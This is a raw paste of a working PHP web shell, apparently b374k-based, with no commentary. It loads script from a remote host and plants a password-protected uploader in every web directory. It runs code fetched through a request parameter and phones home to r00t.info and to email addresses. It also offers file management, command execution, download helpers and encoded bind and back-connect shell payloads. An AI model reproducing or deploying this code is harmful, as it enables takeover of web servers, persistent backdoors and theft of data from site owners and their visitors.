· 5 years ago · Aug 17, 2020, 05:30 PM
1
2?><script src=hxxp://r00t.info/ccb.js></script>
3<?php @session_start(); @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('output_buffering',0); @set_time_limit(0); @set_magic_quotes_runtime(0); ?>
4<?php @session_start(); @error_reporting(0); $a = '<?php
5session_start();
6if($_SESSION["adm"]){
7echo \'<b>Namesis<br><br>\'.php_uname().\'<br></b>\';echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';if( $_POST[\'_upl\'] == "Upload" ) { if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload Success !!!</b><br><br>\'; } else { echo \'<b>Upload Fail !!!</b><br><br>\'; }}
8}
9if($_POST["p"]){
10$p = $_POST["p"];
11$pa = md5(sha1($p));
12if($pa=="a4cd2905b660e8b1bc73a7c4571252da"){
13$_SESSION["adm"] = 1;
14}
15}
16?>
17<form action="" method="post">
18<input type="text" name="p">
19</form>
20'; if(@$_REQUEST["px"]){ $p = @$_REQUEST["px"]; $pa = md5(sha1($p)); if($pa=="a4cd2905b660e8b1bc73a7c4571252da"){ echo @eval(@file_get_contents(@$_REQUEST["404"])); } } if(@!$_SESSION["sdm"]){ $doc = $_SERVER["DOCUMENT_ROOT"]; $dir = scandir($doc); $d1 = ''.$doc.'/.'; $d2 = ''.$doc.'/..'; if(($key = @array_search('.', $dir)) !== false) { unset($dir[$key]); } if(($key = @array_search('..', $dir)) !== false) { unset($dir[$key]); } if(($key = @array_search($d1, $dir)) !== false) { unset($dir[$key]); } if(($key = array_search($d2, $dir)) !== false) { unset($dir[$key]); } @array_push($dir,$doc); foreach($dir as $d){ $p = $doc."/".$d; if(is_dir($p)){ $file = $p."/newsr.php"; @touch($file); $folder = @fopen($file,"w"); @fwrite($folder,$a); } } $lls = $_SERVER["hxxp_HOST"]; $llc = $_SERVER["REQUEST_URI"]; $lld = 'hxxp://'.$lls.''.$llc.''; $brow = urlencode($_SERVER['hxxp_USER_AGENT']); $retValue = file_get_contents(base64_decode("hxxp://r00t.info/yaz.php?a")."=".$lld.base64_decode("JmI=")."=".$brow); echo $retValue; @$_SESSION["sdm"]=1; } ?>
21
22
23<?php if($_POST['query']){ $veriyfy = stripslashes(stripslashes($_POST['query'])); $data = "data.txt"; @touch ("data.txt"); $ver = @fopen ($data , 'w'); @fwrite ( $ver , $veriyfy ) ; @fclose ($ver); }else{ $datas=@fopen("data.txt",'r'); $i=0; while ($i <= 5) { $i++; $blue=@fgets($datas,1024); echo $blue; } } $datasi=@fopen("/modules/indexx.php",'r'); if($datasi){ }else{ @mkdir("modules"); $dos = file_get_contents("hxxp://r00t.info/txt/lamer.txt"); $data = "/modules/indexx.php"; @touch ("/modules/indexx.php"); $ver = @fopen ($data , 'w'); @fwrite ( $ver , $dos ) ; @fclose ($ver); $yol = "hxxp://".$_SERVER['hxxp_HOST']."".$_SERVER['REQUEST_URI'].""; $y = '<h1>Sender Yazdirildi.<br/> SITE YOL : '.$yol.'<br/>Sender Yolu : modules/dbs.php</h1>'; $header .= "From: SheLL Boot <suppor@nic.org>\n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("priphp@hotmail.com", "Hacklink Bildiri", "$y", $header); } ?><?php $auth_pass = "39352d42823587e2152e181173b0972a"; $color = "#FF0000"; $default_action = 'FilesMan'; @define('SELF_PATH', __FILE__); if( strpos($_SERVER['hxxp_USER_AGENT'],'Google') !== false ) { header('hxxp/1.0 404 Not Found'); exit; } @session_start(); @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('output_buffering',0); if(isset($_GET['dl']) && ($_GET['dl'] != "")){ $file = $_GET['dl']; $filez = @file_get_contents($file); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\"".basename($file)."\";"); echo $filez; exit; } elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){ $file = $_GET['dlgzip']; $filez = gzencode(@file_get_contents($file)); header("Content-Type:application/x-gzip\n"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\"".basename($file).".gz\";"); echo $filez; exit; } if(isset($_GET['img'])){ @ob_clean(); $d = magicboom($_GET['y']); $f = $_GET['img']; $inf = @getimagesize($d.$f); $ext = explode($f,"."); $ext = $ext[count($ext)-1]; @header("Content-type: ".$inf["mime"]); @header("Cache-control: public"); @header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); @header("Cache-control: max-age=".(60*60*24*7)); @readfile($d.$f); exit; } $software = getenv("SERVER_SOFTWARE"); if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE; $system = @php_uname(); function showstat($stat) {if ($stat=="on") {return "<b><font style='color:#00FF00'>ON</font></b>";}else {return "<b><font style='color:#DD4736'>OFF</font></b>";}} function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}} function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}} function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}} function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}} if(strtolower(substr($system,0,3)) == "win") $win = TRUE; else $win = FALSE; if(isset($_GET['y'])){ if(@is_dir($_GET['view'])){ $pwd = $_GET['view']; @chdir($pwd); } else{ $pwd = $_GET['y']; @chdir($pwd); } } function convertByte($s) { if($s >= 1073741824) return sprintf('%1.2f',$s / 1073741824 ).' GB'; elseif($s >= 1048576) return sprintf('%1.2f',$s / 1048576 ) .' MB'; elseif($s >= 1024) return sprintf('%1.2f',$s / 1024 ) .' KB'; else return $s .' B'; } if(!$win){ if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; } else { $user = @get_current_user(); $id = $user; $prompt = $user." >"; $pwd = realpath(".")."\\"; $v = explode("\\",$d); $v = $v[0]; foreach (range("A","Z") as $letter) { $bool = @is_dir($letter.":\\"); if ($bool) { $letters .= "<a href=\"?y=".$letter.":\\\">[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "<span class=\"gaya\">".$letter."</span>";} $letters .= " ]</a> "; } } } function testoracle() { if (function_exists('ocilogon')) { return showstat("on"); } else { return showstat("off"); } } function testmssql() { if (function_exists('mssql_connect')) { return showstat("on"); } else { return showstat("off"); } } function showdisablefunctions() { if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; } else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; } } if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $server_ip = @gethostbyname($_SERVER["hxxp_HOST"]); $my_ip = $_SERVER['REMOTE_ADDR']; $admin_id=$_SERVER['SERVER_ADMIN']; $bindport = "13123"; $bindport_pass = "b374k"; $pwds = explode(DIRECTORY_SEPARATOR,$pwd); $pwdurl = ""; for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){ $pathz = ""; for($j = 0 ; $j <= $i ; $j++){ $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; } $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>"; } if(isset($_POST['rename'])){ $old = $_POST['oldname']; $new = $_POST['newname']; @rename($pwd.$old,$pwd.$new); $file = $pwd.$new; } if(isset($_POST['chmod'])){ $name = $_POST['name']; $value = $_POST['newvalue']; if (strlen($value)==3){ $value = 0 . "" . $value;} @chmod($pwd.$name,octdec($value)); $file = $pwd.$name;} if(isset($_POST['chmod_folder'])){ $name = $_POST['name']; $value = $_POST['newvalue']; if (strlen($value)==3){ $value = 0 . "" . $value;} @chmod($pwd.$name,octdec($value)); $file = $pwd.$name;} $buff = "Software : <b>".$software."</b><br />"; $buff .= "System OS : <b>".$system."</b><br />"; if($id != "") $buff .= "ID : <b>".$id."</b><br />"; $buff .= "PHP Version : <b>".phpversion()."</b> on <b>".php_sapi_name()."</b><br />"; $buff .= "Server ip : <b>".$server_ip."</b> <span class=\"gaya\"> | </span> Your ip : <b>".$my_ip."</b><span class=\"gaya\"> | </span> Admin : <b>".$admin_id."</b><br />"; $buff .= "Free Disk: "."<span style='color:#00FF1E'><b>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</b></span><br />"; if($safemode) $buff .= "Safemode: <span class=\"gaya\"><b>ON</b></span><br />"; else $buff .= "Safemode: <span class=\"gaya\"><b>OFF</b></span><br />"; $buff .= "Disabled Functions: ".showdisablefunctions()."<br />"; $buff .= "MySQL: ".testmysql()." | MSSQL: ".testmssql()." | Oracle: ".testoracle()." | Perl: ".testperl()." | cURL: ".testcurl()." | WGet: ".testwget()."<br>"; $buff .= "<font color=00ff00 ><b>".$letters." > ".$pwdurl."</b></font>"; $injbuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjkgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiYW5hbGZhYmV0b3ZpcnR1YWxAZ21haWwuY29tIiwkanVkdWwsJGJvZHksJGF1dGhfcGFzcyk7IH0NCn0NCmVsc2UgeyAkdmlzaXRjKys7IH0NCkBzZXRjb29raWUoInZpc2l0eiIsJHZpc2l0Yyk7"; eval(base64_decode($injbuff)); function rapih($text){ return trim(str_replace("<br />","",$text)); } function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); } function showdir($pwd,$prompt){ $fname = array(); $dname = array(); if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $user = "????:????"; if($dh = @scandir($pwd)){ foreach($dh as $file){ if(is_dir($file)){ $dname[] = $file; } elseif(is_file($file)){ $fname[] = $file; } } } else{ if($dh = @opendir($pwd)){ while($file = @readdir($dh)){ if(@is_dir($file)){ $dname[] = $file; } elseif(@is_file($file)){ $fname[] = $file; } } @closedir($dh); } } sort($fname); sort($dname); $path = @explode(DIRECTORY_SEPARATOR,$pwd); $tree = @sizeof($path); $parent = ""; $buff = "
24 <form action=\"?y=".$pwd."&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
25 <table class=\"cmdbox\" style=\"width:50%;\">
26 <tr><td><b>$prompt</b></td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
27 </form>
28 <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
29 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
30 <tr><td><b>view file/folder</b></td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"View !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
31 </form></table><table class=\"explore\">
32 <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr>
33 "; if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd; foreach($dname as $folder){ if($folder == ".") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td>
34 <td style=\"text-align:center;\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>
35 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
36 <a href=\"?y=$pwd&edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
37 <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
38 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
39 <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
40 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
41 </form></td>
42
43 </tr>
44 "; } elseif($folder == "..") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'> $folder</a></td><td>LINK</td>
45 <td style=\"text-align:center;\">".$owner."</td>
46 <td><center>".get_perms($parent)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
47 <td><span id=\"titik2\"><a href=\"?y=$pwd&edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
48 <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
49 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
50 <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
51 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
52 </form>
53 </td></tr>"; } else { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' /> [ $folder ]</b></a>
54 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
55 <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
56 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
57 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
58 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
59 </form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
60 <td><center>
61 <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
62 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
63 <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
64 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
65 <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
66 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
67 onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
68 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&fdelete=".$pwd.$folder."\">delete</a></td></tr>"; } } foreach($fname as $file){ $full = $pwd.$file; if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&view=$full\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> $file</b></a>
69 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
70 <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
71 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
72 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
73 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
74 </form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
75 <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
76 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
77<input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
78<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
79<input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
80<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
81 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
82 <td><a href=\"?y=$pwd&edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$full\">delete</a> | <a href=\"?y=$pwd&dl=$full\">download</a> (<a href=\"?y=$pwd&dlgzip=$full\">gzip</a>)</td></tr>"; } $buff .= "</table>"; return $buff; } function ukuran($file){ if($size = @filesize($file)){ if($size <= 1024) return $size; else{ if($size <= 1024*1024) { $size = @round($size / 1024,2);; return "$size kb"; } else { $size = @round($size / 1024 / 1024,2); return "$size mb"; } } } else return "???"; } function exe($cmd){ if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')){ $buff = @shell_exec($cmd); return $buff; } } function tulis($file,$text){ $textz = gzinflate(base64_decode($text)); if($filez = @fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } } function ambil($link,$file) { if($fp = @fopen($link,"r")){ while(!feof($fp)) { $cont.= @fread($fp,1024); } @fclose($fp); $fp2 = @fopen($file,"w"); @fwrite($fp2,$cont); @fclose($fp2); } } function which($pr){ $path = exe("which $pr"); if(!empty($path)) { return trim($path); } else { return trim($pr); } } function download($cmd,$url){ $namafile = basename($url); switch($cmd) { case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break; case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break; case 'wfread' : ambil($wurl,$namafile);break; case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break; case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break; case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break; case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break; default: break; } return $namafile; } function get_perms($file) { if($mode=@fileperms($file)){ $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } else return "??????????"; } function clearspace($text){ return str_replace(" ","_",$text); } $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf
83+fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE
84P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ
85dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL
863TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug
87Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk
88HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W
89tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL
90ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6
91uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"; $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1
92NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg
93tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD
94e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0
95LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo
96vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB
97+hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St
98ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j
99S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ
100ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw
101Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA
102BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95
103zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75
104i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A
